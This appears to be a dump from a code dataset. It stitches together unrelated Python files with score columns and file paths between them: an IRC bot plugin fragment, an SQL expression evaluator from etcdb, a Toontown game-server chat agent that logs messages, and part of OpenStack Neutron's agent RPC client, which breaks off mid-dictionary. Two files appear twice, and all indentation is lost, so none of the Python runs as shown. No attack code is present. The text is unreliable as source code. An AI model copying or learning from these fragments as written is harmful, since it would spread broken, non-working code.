track, _ = yield self.controller.config.get_plugin_value(self, server['server'], None, 'track')
if track == 'false':
return
channels, channels_rel = yield self.controller.config.get_plugin_value(self, server['server'], None, 'join')
if channels_rel is None or channels_rel > 0:
channels = [c.strip() for c in (channels or '').split(',') if c.strip()]
if not channel in channels:
channels.append(channel)
self.controller.config.update_plugin_value(self, server['server'], None, 'join', ','.join(channels))
def on_channel_left(self, server, channel):
self._on_channel_left(server, channel)
@defer.inlineCallbacks
def _on_channel_left(self, server, channel):
track, _ = yield self.controller.config.get_plugin_value(self, server['server'], None, 'track')
if track == 'false':
return
channels, channels_rel = yield self.controller.config.get_plugin_value(self, server['server'], None, 'join')
if channels_rel is not None and channels_rel > 0:
channels = [c.strip() for c in (channels or '').split(',') if c.strip()]
if channel in channels:
channels.remove(channel)
self.controller.config.update_plugin_value(self, server['server'], None, 'join', ','.join(channels))
def on_channel_kicked(self, server, channel, kicker, message):
reactor.callLater(3, self._join_channel, server, channel) | 0.720172 | 0.08698 |
from etcdb import OperationalError, __version__
from etcdb.resultset import Column
from etcdb.sqlparser.parser import SQLParserError
class EtcdbFunction(object):
"""EtcdbFunction represents an SQL function.
:param function_name: python function that implements SQL function.
:type function_name: callable
:param group: True if the functions is aggregate function
:type group: bool
:param args: Arguments to pass to function_name
:param kwargs: Keyword arguments"""
def __init__(self, *args, **kwargs):
self._function = args[0]
self._group = kwargs.get('group', False)
self._args = args[1:]
@property
def function(self):
"""Return function name"""
return self._function
@property
def group(self):
"""Return whether the function is aggregate"""
return self._group
def __call__(self, *args, **kwargs):
return self._function(*args, **kwargs)
def __eq__(self, other):
return all(
(
isinstance(other, EtcdbFunction),
self.function == other.function,
self.group == other.group
)
)
def __ne__(self, other):
return not self.__eq__(other)
def eval_identifier(row, identifier):
"""
Get value of identifier for a given row
:param row: row
:type row: tuple(ColumnSet, Row)
:param identifier: Identifier
:type identifier: str
:return: value of identifier
"""
try:
identifier_strip = identifier.split('.')[1]
except IndexError:
identifier_strip = identifier
# If row isn't given return column name only
if row:
columns = row[0]
data = row[1]
else:
return identifier_strip, None
try:
pos = columns.index(Column(identifier_strip))
return identifier_strip, data[pos]
except ValueError:
raise OperationalError('Unknown identifier %s' % identifier_strip)
def eval_string(value):
"""Evaluate string token"""
return '%s' % value, value
def etcdb_version():
"""Get etcdb version"""
return __version__
def etcdb_count(result_set):
"""
Count rows in result set
:param result_set: ResultSet instance
:type result_set: ResultSet
:return: number of rows in ResultSet
:rtype: int
"""
return len(result_set.rows)
def eval_function_call(row, tree): # pylint: disable=unused-argument
"""Evaluate function call
:return: tuple with field name and EtcdbFunction instance"""
if tree == 'VERSION':
# func = EtcdbFunction(version, group=False)
return "VERSION()", EtcdbFunction(etcdb_version, group=False)
if tree == 'COUNT':
# func = EtcdbFunction(version, group=False)
return "COUNT(*)", EtcdbFunction(etcdb_count, group=True)
raise NotImplementedError('Unknown function %s' % tree)
def eval_simple_expr(row, tree):
"""Evaluate simple_expr"""
if tree[0] == 'IDENTIFIER':
return eval_identifier(row, tree[1])
elif tree[0] == 'STRING' or tree[0] == 'literal':
return eval_string(tree[1])
elif tree[0] == 'function_call':
return eval_function_call(row, tree[1])
elif tree[0] == 'expr':
return eval_expr(row, tree[1])
else:
raise SQLParserError('%s is not implemented' % tree[0])
def eval_bit_expr(row, tree):
"""Evaluate bit_expr"""
if tree[0] == 'simple_expr':
return eval_simple_expr(row, tree[1])
else:
raise SQLParserError('%s is not implemented' % tree[0])
def eval_predicate(row, tree):
"""Evaluate predicate"""
if tree[0] == 'bit_expr':
return eval_bit_expr(row, tree[1])
if tree[0] == 'IN':
simple_expr = eval_simple_expr(row, tree[1][1])
for expr_tree in tree[2]:
expr_value = eval_expr(row, expr_tree)
if expr_value[1] == simple_expr[1]:
return '%s IN (%s)' % (simple_expr[0], expr_value[0]), True
return '%s IN (expr)' % (simple_expr[0], ), False
else:
raise SQLParserError('%s is not implemented' % tree[0])
def eval_bool_primary(row, tree): # pylint: disable=too-many-return-statements
"""Evaluate bool_primary"""
if tree[0] == 'IS NULL':
bool_primary1 = eval_bool_primary(row, tree[1])
return "%s IS NULL" % bool_primary1[0], \
bool_primary1[1] is None
elif tree[0] == 'IS NOT NULL':
bool_primary1 = eval_bool_primary(row, tree[1])
return "%s IS NOT NULL" % bool_primary1[0], \
bool_primary1[1] is not None
elif tree[0] == '=':
bool_primary1 = eval_bool_primary(row, tree[1])
bool_primary2 = eval_bool_primary(row, tree[2])
return (
"%s = %s" % (bool_primary1[0], bool_primary2[0]),
bool_primary1[1] == bool_primary2[1]
)
elif tree[0] == '>=':
bool_primary1 = eval_bool_primary(row, tree[1])
bool_primary2 = eval_bool_primary(row, tree[2])
return (
"%s >= %s" % (bool_primary1[0], bool_primary2[0]),
bool_primary1[1] >= bool_primary2[1]
)
elif tree[0] == '>':
bool_primary1 = eval_bool_primary(row, tree[1])
bool_primary2 = eval_bool_primary(row, tree[2])
return (
"%s > %s" % (bool_primary1[0], bool_primary2[0]),
bool_primary1[1] > bool_primary2[1]
)
elif tree[0] == '<=':
bool_primary1 = eval_bool_primary(row, tree[1])
bool_primary2 = eval_bool_primary(row, tree[2])
return (
"%s <= %s" % (bool_primary1[0], bool_primary2[0]),
bool_primary1[1] <= bool_primary2[1]
)
elif tree[0] == '<':
bool_primary1 = eval_bool_primary(row, tree[1])
bool_primary2 = eval_bool_primary(row, tree[2])
return (
"%s < %s" % (bool_primary1[0], bool_primary2[0]),
bool_primary1[1] < bool_primary2[1]
)
elif tree[0] in ['<>', '!=']:
bool_primary1 = eval_bool_primary(row, tree[1])
bool_primary2 = eval_bool_primary(row, tree[2])
return (
"%s %s %s" % (bool_primary1[0], tree[0], bool_primary2[0]),
bool_primary1[1] != bool_primary2[1]
)
elif tree[0] == 'predicate':
return eval_predicate(row, tree[1])
elif tree[0] == 'bit_expr':
return eval_bit_expr(row, tree[1])
else:
raise SQLParserError('%s is not implemented' % tree[0])
def eval_expr(row, tree):
"""Evaluate expression
:return: Tuple with string representation and value.
For example, ('id', 5).
:rtype: tuple
"""
if tree[0] == 'OR':
expr1 = eval_expr(row, tree[1])
expr2 = eval_expr(row, tree[2])
return (
'%s OR %s' % (expr1[0], expr2[0]),
expr1[1] or expr2[1]
)
elif tree[0] == 'AND':
expr1 = eval_expr(row, tree[1])
expr2 = eval_expr(row, tree[2])
return (
'%s AND %s' % (expr1[0], expr2[0]),
expr1[1] and expr2[1]
)
elif tree[0] == 'NOT':
expr1 = eval_expr(row, tree[1])
return (
'NOT %s' % expr1[0],
not expr1[1]
)
elif tree[0] == 'bool_primary':
return eval_bool_primary(row, tree[1])
else:
raise SQLParserError('%r is not implemented' % tree[0]) | etcdb/eval_expr.py | from etcdb import OperationalError, __version__
from etcdb.resultset import Column
from etcdb.sqlparser.parser import SQLParserError
class EtcdbFunction(object):
"""EtcdbFunction represents an SQL function.
:param function_name: python function that implements SQL function.
:type function_name: callable
:param group: True if the functions is aggregate function
:type group: bool
:param args: Arguments to pass to function_name
:param kwargs: Keyword arguments"""
def __init__(self, *args, **kwargs):
self._function = args[0]
self._group = kwargs.get('group', False)
self._args = args[1:]
@property
def function(self):
"""Return function name"""
return self._function
@property
def group(self):
"""Return whether the function is aggregate"""
return self._group
def __call__(self, *args, **kwargs):
return self._function(*args, **kwargs)
def __eq__(self, other):
return all(
(
isinstance(other, EtcdbFunction),
self.function == other.function,
self.group == other.group
)
)
def __ne__(self, other):
return not self.__eq__(other)
def eval_identifier(row, identifier):
"""
Get value of identifier for a given row
:param row: row
:type row: tuple(ColumnSet, Row)
:param identifier: Identifier
:type identifier: str
:return: value of identifier
"""
try:
identifier_strip = identifier.split('.')[1]
except IndexError:
identifier_strip = identifier
# If row isn't given return column name only
if row:
columns = row[0]
data = row[1]
else:
return identifier_strip, None
try:
pos = columns.index(Column(identifier_strip))
return identifier_strip, data[pos]
except ValueError:
raise OperationalError('Unknown identifier %s' % identifier_strip)
def eval_string(value):
"""Evaluate string token"""
return '%s' % value, value
def etcdb_version():
"""Get etcdb version"""
return __version__
def etcdb_count(result_set):
"""
Count rows in result set
:param result_set: ResultSet instance
:type result_set: ResultSet
:return: number of rows in ResultSet
:rtype: int
"""
return len(result_set.rows)
def eval_function_call(row, tree): # pylint: disable=unused-argument
"""Evaluate function call
:return: tuple with field name and EtcdbFunction instance"""
if tree == 'VERSION':
# func = EtcdbFunction(version, group=False)
return "VERSION()", EtcdbFunction(etcdb_version, group=False)
if tree == 'COUNT':
# func = EtcdbFunction(version, group=False)
return "COUNT(*)", EtcdbFunction(etcdb_count, group=True)
raise NotImplementedError('Unknown function %s' % tree)
def eval_simple_expr(row, tree):
"""Evaluate simple_expr"""
if tree[0] == 'IDENTIFIER':
return eval_identifier(row, tree[1])
elif tree[0] == 'STRING' or tree[0] == 'literal':
return eval_string(tree[1])
elif tree[0] == 'function_call':
return eval_function_call(row, tree[1])
elif tree[0] == 'expr':
return eval_expr(row, tree[1])
else:
raise SQLParserError('%s is not implemented' % tree[0])
def eval_bit_expr(row, tree):
"""Evaluate bit_expr"""
if tree[0] == 'simple_expr':
return eval_simple_expr(row, tree[1])
else:
raise SQLParserError('%s is not implemented' % tree[0])
def eval_predicate(row, tree):
"""Evaluate predicate"""
if tree[0] == 'bit_expr':
return eval_bit_expr(row, tree[1])
if tree[0] == 'IN':
simple_expr = eval_simple_expr(row, tree[1][1])
for expr_tree in tree[2]:
expr_value = eval_expr(row, expr_tree)
if expr_value[1] == simple_expr[1]:
return '%s IN (%s)' % (simple_expr[0], expr_value[0]), True
return '%s IN (expr)' % (simple_expr[0], ), False
else:
raise SQLParserError('%s is not implemented' % tree[0])
def eval_bool_primary(row, tree): # pylint: disable=too-many-return-statements
"""Evaluate bool_primary"""
if tree[0] == 'IS NULL':
bool_primary1 = eval_bool_primary(row, tree[1])
return "%s IS NULL" % bool_primary1[0], \
bool_primary1[1] is None
elif tree[0] == 'IS NOT NULL':
bool_primary1 = eval_bool_primary(row, tree[1])
return "%s IS NOT NULL" % bool_primary1[0], \
bool_primary1[1] is not None
elif tree[0] == '=':
bool_primary1 = eval_bool_primary(row, tree[1])
bool_primary2 = eval_bool_primary(row, tree[2])
return (
"%s = %s" % (bool_primary1[0], bool_primary2[0]),
bool_primary1[1] == bool_primary2[1]
)
elif tree[0] == '>=':
bool_primary1 = eval_bool_primary(row, tree[1])
bool_primary2 = eval_bool_primary(row, tree[2])
return (
"%s >= %s" % (bool_primary1[0], bool_primary2[0]),
bool_primary1[1] >= bool_primary2[1]
)
elif tree[0] == '>':
bool_primary1 = eval_bool_primary(row, tree[1])
bool_primary2 = eval_bool_primary(row, tree[2])
return (
"%s > %s" % (bool_primary1[0], bool_primary2[0]),
bool_primary1[1] > bool_primary2[1]
)
elif tree[0] == '<=':
bool_primary1 = eval_bool_primary(row, tree[1])
bool_primary2 = eval_bool_primary(row, tree[2])
return (
"%s <= %s" % (bool_primary1[0], bool_primary2[0]),
bool_primary1[1] <= bool_primary2[1]
)
elif tree[0] == '<':
bool_primary1 = eval_bool_primary(row, tree[1])
bool_primary2 = eval_bool_primary(row, tree[2])
return (
"%s < %s" % (bool_primary1[0], bool_primary2[0]),
bool_primary1[1] < bool_primary2[1]
)
elif tree[0] in ['<>', '!=']:
bool_primary1 = eval_bool_primary(row, tree[1])
bool_primary2 = eval_bool_primary(row, tree[2])
return (
"%s %s %s" % (bool_primary1[0], tree[0], bool_primary2[0]),
bool_primary1[1] != bool_primary2[1]
)
elif tree[0] == 'predicate':
return eval_predicate(row, tree[1])
elif tree[0] == 'bit_expr':
return eval_bit_expr(row, tree[1])
else:
raise SQLParserError('%s is not implemented' % tree[0])
def eval_expr(row, tree):
"""Evaluate expression
:return: Tuple with string representation and value.
For example, ('id', 5).
:rtype: tuple
"""
if tree[0] == 'OR':
expr1 = eval_expr(row, tree[1])
expr2 = eval_expr(row, tree[2])
return (
'%s OR %s' % (expr1[0], expr2[0]),
expr1[1] or expr2[1]
)
elif tree[0] == 'AND':
expr1 = eval_expr(row, tree[1])
expr2 = eval_expr(row, tree[2])
return (
'%s AND %s' % (expr1[0], expr2[0]),
expr1[1] and expr2[1]
)
elif tree[0] == 'NOT':
expr1 = eval_expr(row, tree[1])
return (
'NOT %s' % expr1[0],
not expr1[1]
)
elif tree[0] == 'bool_primary':
return eval_bool_primary(row, tree[1])
else:
raise SQLParserError('%r is not implemented' % tree[0]) | 0.76856 | 0.439988 |
from direct.distributed.DistributedObjectGlobalAI import DistributedObjectGlobalAI
from direct.directnotify import DirectNotifyGlobal
from toontown.chat.ChatGlobals import *
from otp.distributed import OtpDoGlobals
from direct.distributed.PyDatagram import PyDatagram
from direct.distributed.MsgTypes import *
from time import gmtime, strftime
import json
import httplib
import six
def to_bool(boolorstr):
if isinstance(boolorstr, six.string_types):
return boolorstr.lower() == 'true'
if isinstance(boolorstr, bool):
return boolorstr
else:
return False
class ChatAgentAI(DistributedObjectGlobalAI):
notify = DirectNotifyGlobal.directNotify.newCategory("ChatAgentAI")
def __init__(self, air):
DistributedObjectGlobalAI.__init__(self, air)
self.chatMode2channel = {
1: OtpDoGlobals.OTP_MOD_CHANNEL,
2: OtpDoGlobals.OTP_ADMIN_CHANNEL,
3: OtpDoGlobals.OTP_SYSADMIN_CHANNEL,
}
self.air = air
self.accept('requestToonAccess', self.getToonAccess)
self.accept('warningUpdate', self.updateWarnings)
self.accept('requestOffenses', self.sendAvatarOffenses)
self.accept('sendSystemMessage', self.sendSystemMessage)
self.accept('chatBan', self.banAvatar)
self.accountId = 0
self.domain = str(ConfigVariableString('ws-domain', 'localhost'))
self.key = str(ConfigVariableString('ws-key', 'secretkey'))
def chatMessage(self, message, fakeChatMode):
sender = self.air.getAvatarIdFromSender()
if not sender:
self.air.writeServerEvent('suspicious', self.air.getAccountIdFromSender(),
'Account sent chat without an avatar', message)
return
if fakeChatMode != 0:
# We've caught a skid!
self.notify.warning('Fake chat mode was not zero for avatar %s' % sender)
return
av = self.air.doId2do.get(sender)
if not av:
return
chatMode = av.getChatMode()
self.sendUpdate('chatMessageAiToUd', [sender, message, chatMode])
def chatMessageResponse(self, sender, message, modifications, chatMode):
if sender not in self.air.doId2do.keys():
# found an invalid sender!
return
av = self.air.doId2do[sender]
if not av:
# got a invalid avatar object!
return
# broadcast chat message update
av.b_setTalk(sender, self.chatMode2channel.get(chatMode, sender), av.getName(), message, modifications,
CFSpeech | CFQuicktalker | CFTimeout)
self.air.dbInterface.queryObject(self.air.dbId, av.DISLid, self.dbCallback)
getRealUsername = httplib.HTTPSConnection(self.domain)
getRealUsername.request('GET', '/api/tokentousername/%s/%s' % (self.key, self.accountId))
try:
f = getRealUsername.getresponse().read()
getRealUsernameResp = json.loads(f)
if to_bool(getRealUsernameResp["error"]):
username = "ERROR " + getRealUsernameResp["message"]
else:
username = getRealUsernameResp['username']
except:
self.notify.debug("Fatal Error During Logging!")
username = 'ERRORED'
filename = 'data/%s_chatlog.txt' % str(self.air.districtId)
file = open(filename, 'a')
file.write(strftime("%Y-%m-%d %H:%M:%S", gmtime()) + ': ' + str(sender) + '(%s)' % username + ': ' + message + "\n")
file.close()
def dbCallback(self, dclass, fields):
if dclass != self.air.dclassesByName['AccountAI']:
return
self.accountId = fields.get('ACCOUNT_ID')
if not self.accountId:
return
def getToonAccess(self, avId):
av = self.air.doId2do.get(avId)
if not av:
return
access = av.getAccessLevel()
self.air.sendNetEvent('requestToonAccessResponse', [access])
def sendAvatarOffenses(self, avId, sender):
av = self.air.doId2do.get(avId, 0)
if av == 0:
self.notify.warning("Failed to update %d's chat offenses!" % (int(avId)))
return
self.air.sendNetEvent('setAvatarOffenses', [sender, int(av.getWarningCount())])
def banAvatar(self, avId, msg, time):
self.notify.debug("Got ban request from Uberdog!")
av = self.air.doId2do.get(avId, 0)
if av == 0:
self.notify.warning("Failed to ban %d for chat abuse!" % (int(avId)))
return
if av.getAdminAccess() < MINIMUM_MAGICWORD_ACCESS:
av.doWarningBan('Chat Abuse', 24)
def sendSystemMessage(self, message, avId):
av = self.air.doId2do.get(avId, 0)
if av == 0:
self.notify.warning("Failed to send system message for %d" % (int(avId)))
return
self.air.newsManager.sendSystemMessageToAvatar(av, message, 10)
def updateWarnings(self, avId, count, doBan):
av = self.air.doId2do.get(avId, 0)
if av == 0:
self.notify.warning("Failed to update %d's warnings!" % (int(avId)))
return
av.b_setWarningCount(count, doBan)
def kickForSpam(self, avatar):
pass | otp/chat/ChatAgentAI.py | from direct.distributed.DistributedObjectGlobalAI import DistributedObjectGlobalAI
from direct.directnotify import DirectNotifyGlobal
from toontown.chat.ChatGlobals import *
from otp.distributed import OtpDoGlobals
from direct.distributed.PyDatagram import PyDatagram
from direct.distributed.MsgTypes import *
from time import gmtime, strftime
import json
import httplib
import six
def to_bool(boolorstr):
if isinstance(boolorstr, six.string_types):
return boolorstr.lower() == 'true'
if isinstance(boolorstr, bool):
return boolorstr
else:
return False
class ChatAgentAI(DistributedObjectGlobalAI):
notify = DirectNotifyGlobal.directNotify.newCategory("ChatAgentAI")
def __init__(self, air):
DistributedObjectGlobalAI.__init__(self, air)
self.chatMode2channel = {
1: OtpDoGlobals.OTP_MOD_CHANNEL,
2: OtpDoGlobals.OTP_ADMIN_CHANNEL,
3: OtpDoGlobals.OTP_SYSADMIN_CHANNEL,
}
self.air = air
self.accept('requestToonAccess', self.getToonAccess)
self.accept('warningUpdate', self.updateWarnings)
self.accept('requestOffenses', self.sendAvatarOffenses)
self.accept('sendSystemMessage', self.sendSystemMessage)
self.accept('chatBan', self.banAvatar)
self.accountId = 0
self.domain = str(ConfigVariableString('ws-domain', 'localhost'))
self.key = str(ConfigVariableString('ws-key', 'secretkey'))
def chatMessage(self, message, fakeChatMode):
sender = self.air.getAvatarIdFromSender()
if not sender:
self.air.writeServerEvent('suspicious', self.air.getAccountIdFromSender(),
'Account sent chat without an avatar', message)
return
if fakeChatMode != 0:
# We've caught a skid!
self.notify.warning('Fake chat mode was not zero for avatar %s' % sender)
return
av = self.air.doId2do.get(sender)
if not av:
return
chatMode = av.getChatMode()
self.sendUpdate('chatMessageAiToUd', [sender, message, chatMode])
def chatMessageResponse(self, sender, message, modifications, chatMode):
if sender not in self.air.doId2do.keys():
# found an invalid sender!
return
av = self.air.doId2do[sender]
if not av:
# got a invalid avatar object!
return
# broadcast chat message update
av.b_setTalk(sender, self.chatMode2channel.get(chatMode, sender), av.getName(), message, modifications,
CFSpeech | CFQuicktalker | CFTimeout)
self.air.dbInterface.queryObject(self.air.dbId, av.DISLid, self.dbCallback)
getRealUsername = httplib.HTTPSConnection(self.domain)
getRealUsername.request('GET', '/api/tokentousername/%s/%s' % (self.key, self.accountId))
try:
f = getRealUsername.getresponse().read()
getRealUsernameResp = json.loads(f)
if to_bool(getRealUsernameResp["error"]):
username = "ERROR " + getRealUsernameResp["message"]
else:
username = getRealUsernameResp['username']
except:
self.notify.debug("Fatal Error During Logging!")
username = 'ERRORED'
filename = 'data/%s_chatlog.txt' % str(self.air.districtId)
file = open(filename, 'a')
file.write(strftime("%Y-%m-%d %H:%M:%S", gmtime()) + ': ' + str(sender) + '(%s)' % username + ': ' + message + "\n")
file.close()
def dbCallback(self, dclass, fields):
if dclass != self.air.dclassesByName['AccountAI']:
return
self.accountId = fields.get('ACCOUNT_ID')
if not self.accountId:
return
def getToonAccess(self, avId):
av = self.air.doId2do.get(avId)
if not av:
return
access = av.getAccessLevel()
self.air.sendNetEvent('requestToonAccessResponse', [access])
def sendAvatarOffenses(self, avId, sender):
av = self.air.doId2do.get(avId, 0)
if av == 0:
self.notify.warning("Failed to update %d's chat offenses!" % (int(avId)))
return
self.air.sendNetEvent('setAvatarOffenses', [sender, int(av.getWarningCount())])
def banAvatar(self, avId, msg, time):
self.notify.debug("Got ban request from Uberdog!")
av = self.air.doId2do.get(avId, 0)
if av == 0:
self.notify.warning("Failed to ban %d for chat abuse!" % (int(avId)))
return
if av.getAdminAccess() < MINIMUM_MAGICWORD_ACCESS:
av.doWarningBan('Chat Abuse', 24)
def sendSystemMessage(self, message, avId):
av = self.air.doId2do.get(avId, 0)
if av == 0:
self.notify.warning("Failed to send system message for %d" % (int(avId)))
return
self.air.newsManager.sendSystemMessageToAvatar(av, message, 10)
def updateWarnings(self, avId, count, doBan):
av = self.air.doId2do.get(avId, 0)
if av == 0:
self.notify.warning("Failed to update %d's warnings!" % (int(avId)))
return
av.b_setWarningCount(count, doBan)
def kickForSpam(self, avatar):
pass | 0.507568 | 0.051893 |
from datetime import datetime
import itertools
import netaddr
from neutron_lib.agent import topics
from neutron_lib.api.definitions import portbindings_extended as pb_ext
from neutron_lib.callbacks import events as callback_events
from neutron_lib.callbacks import registry
from neutron_lib.callbacks import resources as callback_resources
from neutron_lib import constants
from neutron_lib.plugins import utils
from neutron_lib import rpc as lib_rpc
from oslo_log import log as logging
import oslo_messaging
from oslo_utils import uuidutils
from neutron.agent import resource_cache
from neutron.api.rpc.callbacks import resources
from neutron.common import _constants as n_const
from neutron import objects
LOG = logging.getLogger(__name__)
BINDING_DEACTIVATE = 'binding_deactivate'
def create_consumers(endpoints, prefix, topic_details, start_listening=True):
"""Create agent RPC consumers.
:param endpoints: The list of endpoints to process the incoming messages.
:param prefix: Common prefix for the plugin/agent message queues.
:param topic_details: A list of topics. Each topic has a name, an
operation, and an optional host param keying the
subscription to topic.host for plugin calls.
:param start_listening: if True, it starts the processing loop
:returns: A common Connection.
"""
connection = lib_rpc.Connection()
for details in topic_details:
topic, operation, node_name = itertools.islice(
itertools.chain(details, [None]), 3)
topic_name = topics.get_topic_name(prefix, topic, operation)
connection.create_consumer(topic_name, endpoints, fanout=True)
if node_name:
node_topic_name = '%s.%s' % (topic_name, node_name)
connection.create_consumer(node_topic_name,
endpoints,
fanout=False)
if start_listening:
connection.consume_in_threads()
return connection
class PluginReportStateAPI(object):
"""RPC client used to report state back to plugin.
This class implements the client side of an rpc interface. The server side
can be found in neutron.db.agents_db.AgentExtRpcCallback. For more
information on changing rpc interfaces, see
doc/source/contributor/internals/rpc_api.rst.
"""
def __init__(self, topic):
target = oslo_messaging.Target(topic=topic, version='1.2',
namespace=constants.RPC_NAMESPACE_STATE)
self.client = lib_rpc.get_client(target)
def has_alive_neutron_server(self, context, **kwargs):
cctxt = self.client.prepare()
return cctxt.call(context, 'has_alive_neutron_server', **kwargs)
def report_state(self, context, agent_state, use_call=False):
cctxt = self.client.prepare(
timeout=lib_rpc.TRANSPORT.conf.rpc_response_timeout)
# add unique identifier to a report
# that can be logged on server side.
# This create visible correspondence between events on
# the agent and on the server
agent_state['uuid'] = uuidutils.generate_uuid()
kwargs = {
'agent_state': {'agent_state': agent_state},
'time': datetime.utcnow().strftime(constants.ISO8601_TIME_FORMAT),
}
method = cctxt.call if use_call else cctxt.cast
return method(context, 'report_state', **kwargs)
class PluginApi(object):
'''Agent side of the rpc API.
API version history:
1.0 - Initial version.
1.3 - get_device_details rpc signature upgrade to obtain 'host' and
return value to include fixed_ips and device_owner for
the device port
1.4 - tunnel_sync rpc signature upgrade to obtain 'host'
1.5 - Support update_device_list and
get_devices_details_list_and_failed_devices
'''
def __init__(self, topic):
target = oslo_messaging.Target(topic=topic, version='1.0')
self.client = lib_rpc.get_client(target)
def get_device_details(self, context, device, agent_id, host=None):
cctxt = self.client.prepare()
return cctxt.call(context, 'get_device_details', device=device,
agent_id=agent_id, host=host)
def get_devices_details_list(self, context, devices, agent_id, host=None):
cctxt = self.client.prepare(version='1.3')
return cctxt.call(context, 'get_devices_details_list',
devices=devices, agent_id=agent_id, host=host)
def get_devices_details_list_and_failed_devices(self, context, devices,
agent_id, host=None):
"""Get devices details and the list of devices that failed.
This method returns the devices details. If an error is thrown when
retrieving the devices details, the device is put in a list of
failed devices.
"""
cctxt = self.client.prepare(version='1.5')
return cctxt.call(
context,
'get_devices_details_list_and_failed_devices',
devices=devices, agent_id=agent_id, host=host)
def update_device_down(self, context, device, agent_id, host=None):
cctxt = self.client.prepare()
return cctxt.call(context, 'update_device_down', device=device,
agent_id=agent_id, host=host)
def update_device_up(self, context, device, agent_id, host=None):
cctxt = self.client.prepare()
return cctxt.call(context, 'update_device_up', device=device,
agent_id=agent_id, host=host)
def update_device_list(self, context, devices_up, devices_down,
agent_id, host, agent_restarted=False):
cctxt = self.client.prepare(version='1.5')
ret_devices_up = []
failed_devices_up = []
ret_devices_down = []
failed_devices_down = []
step = n_const.RPC_RES_PROCESSING_STEP
devices_up = list(devices_up)
devices_down = list(devices_down)
for i in range(0, max(len(devices_up), len(devices_down)), step):
# Divide-and-conquer RPC timeout
ret = cctxt.call(context, 'update_device_list',
devices_up=devices_up[i:i + step],
devices_down=devices_down[i:i + step],
agent_id=agent_id, host=host,
agent_restarted=agent_restarted)
ret_devices_up.extend(ret.get("devices_up", []))
failed_devices_up.extend(ret.get("failed_devices_up", []))
ret_devices_down.extend(ret.get("devices_down", []))
failed_devices_down.extend(ret.get("failed_devices_down", []))
return {'devices_up': ret_devices_up,
'failed_devices_up': failed_devices_up,
'devices_down': ret_devices_down,
'failed_devices_down': failed_devices_down}
def tunnel_sync(self, context, tunnel_ip, tunnel_type=None, host=None):
cctxt = self.client.prepare(version='1.4')
return cctxt.call(context, 'tunnel_sync', tunnel_ip=tunnel_ip,
tunnel_type=tunnel_type, host=host)
def create_cache_for_l2_agent():
"""Create a push-notifications cache for L2 agent related resources."""
objects.register_objects()
resource_types = [
resources.PORT,
resources.SECURITYGROUP,
resources.SECURITYGROUPRULE,
resources.NETWORK,
resources.SUBNET
]
rcache = resource_cache.RemoteResourceCache(resource_types)
rcache.start_watcher()
return rcache
class CacheBackedPluginApi(PluginApi):
def __init__(self, *args, **kwargs):
super(CacheBackedPluginApi, self).__init__(*args, **kwargs)
self.remote_resource_cache = create_cache_for_l2_agent()
def register_legacy_notification_callbacks(self, legacy_interface):
"""Emulates the server-side notifications from ml2 AgentNotifierApi.
legacy_interface is an object with 'delete'/'update' methods for
core resources.
"""
self._legacy_interface = legacy_interface
for e in (callback_events.AFTER_UPDATE, callback_events.AFTER_DELETE):
for r in (resources.PORT, resources.NETWORK):
registry.subscribe(self._legacy_notifier, r, e)
def _legacy_notifier(self, rtype, event, trigger, context, resource_id,
**kwargs):
"""Checks if legacy interface is expecting calls for resource.
looks for port_update, network_delete, etc and calls them with
the payloads the handlers are expecting (an ID).
"""
rtype = rtype.lower() # all legacy handlers don't camelcase
method, host_with_activation, host_with_deactivation = (
self._get_method_host(rtype, event, **kwargs))
if not hasattr(self._legacy_interface, method):
# TODO(kevinbenton): once these notifications are stable, emit
# a deprecation warning for legacy handlers
return
# If there is a binding deactivation, we must also notify the
# corresponding activation
if method == BINDING_DEACTIVATE:
self._legacy_interface.binding_deactivate(
context, port_id=resource_id, host=host_with_deactivation)
self._legacy_interface.binding_activate(
context, port_id=resource_id, host=host_with_activation)
else:
payload = {rtype: {'id': resource_id},
'%s_id' % rtype: resource_id}
getattr(self._legacy_interface, method)(context, **payload)
def _get_method_host(self, rtype, event, **kwargs):
"""Constructs the name of method to be called in the legacy interface.
If the event received is a port update that contains a binding
activation where a previous binding is deactivated, the method name
is 'binding_deactivate' and the host where the binding has to be
deactivated is returned. Otherwise, the method name is constructed from
rtype and the event received and the host is None.
"""
is_delete = event == callback_events.AFTER_DELETE
suffix = 'delete' if is_delete else 'update'
method = "%s_%s" % (rtype, suffix)
host_with_activation = None
host_with_deactivation = None
if is_delete or rtype != callback_resources.PORT:
return method, host_with_activation, host_with_deactivation
# A port update was received. Find out if it is a binding activation
# where a previous binding was deactivated
BINDINGS = pb_ext.COLLECTION_NAME
if BINDINGS in kwargs.get('changed_fields', set()):
existing_active_binding = (
utils.get_port_binding_by_status_and_host(
getattr(kwargs['existing'], 'bindings', []),
constants.ACTIVE))
updated_active_binding = (
utils.get_port_binding_by_status_and_host(
getattr(kwargs['updated'], 'bindings', []),
constants.ACTIVE))
if (existing_active_binding and updated_active_binding and
existing_active_binding.host !=
updated_active_binding.host):
if (utils.get_port_binding_by_status_and_host(
getattr(kwargs['updated'], 'bindings', []),
constants.INACTIVE,
host=existing_active_binding.host)):
method = BINDING_DEACTIVATE
host_with_activation = updated_active_binding.host
host_with_deactivation = existing_active_binding.host
return method, host_with_activation, host_with_deactivation
def get_devices_details_list_and_failed_devices(self, context, devices,
agent_id, host=None):
result = {'devices': [], 'failed_devices': []}
for device in devices:
try:
result['devices'].append(
self.get_device_details(context, device, agent_id, host))
except Exception:
LOG.exception("Failed to get details for device %s", device)
result['failed_devices'].append(device)
return result
def get_device_details(self, context, device, agent_id, host=None):
port_obj = self.remote_resource_cache.get_resource_by_id(
resources.PORT, device)
if not port_obj:
LOG.debug("Device %s does not exist in cache.", device)
return {'device': device}
if not port_obj.binding_levels:
LOG.warning("Device %s is not bound.", port_obj)
return {'device': device}
segment = port_obj.binding_levels[-1].segment
if not segment:
LOG.debug("Device %s is not bound to any segment.", port_obj)
return {'device': device}
binding = utils.get_port_binding_by_status_and_host(
port_obj.bindings, constants.ACTIVE, raise_if_not_found=True,
port_id=port_obj.id)
if (port_obj.device_owner.startswith(
constants.DEVICE_OWNER_COMPUTE_PREFIX) and
binding[pb_ext.HOST] != host):
LOG.debug("Device %s has no active binding in this host",
port_obj)
return {'device': device,
constants.NO_ACTIVE_BINDING: True}
net = self.remote_resource_cache.get_resource_by_id(
resources.NETWORK, port_obj.network_id)
net_qos_policy_id = net.qos_policy_id
# match format of old RPC interface
mac_addr = str(netaddr.EUI(str(port_obj.mac_address),
dialect=netaddr.mac_unix_expanded))
entry = {
'device': device,
'network_id': port_obj.network_id,
'port_id': port_obj.id,
'mac_address': mac_addr,
'admin_state_up': port_obj.admin_state_up,
